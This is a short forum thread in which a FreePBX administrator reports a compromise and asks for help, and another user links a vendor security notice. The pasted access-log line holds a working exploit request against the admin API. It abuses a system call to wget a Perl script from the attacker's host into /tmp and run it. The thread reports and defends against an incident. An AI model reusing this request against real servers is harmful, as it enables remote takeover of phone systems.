Successful web attack to my freepbx host

whoim · April 3, 2014, 2:44pm

Hello!
Now i view new addministrators at webgiu and many edited rules in freepbx latest update…

string from access_log:
85.25.195.171 - - [03/Apr/2014:13:11:41 +0400] “GET /admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=wget%20http://85.25.195.171/dcs.txt%20-O%20/tmp/back.txt;perl%20/tmp/back.txt; HTTP/1.1” 200 197 “http://85.25.195.171/rec/pbxs.php?ip=MYFREEPBXSERVER_IP%3A889&ext=*111” "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)"
full log may email to you, if you need.

tm1000 · April 3, 2014, 4:19pm

http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice

whoim · April 3, 2014, 5:19pm

Thanks! Already update all servers. Maybe, need httpd basic auth?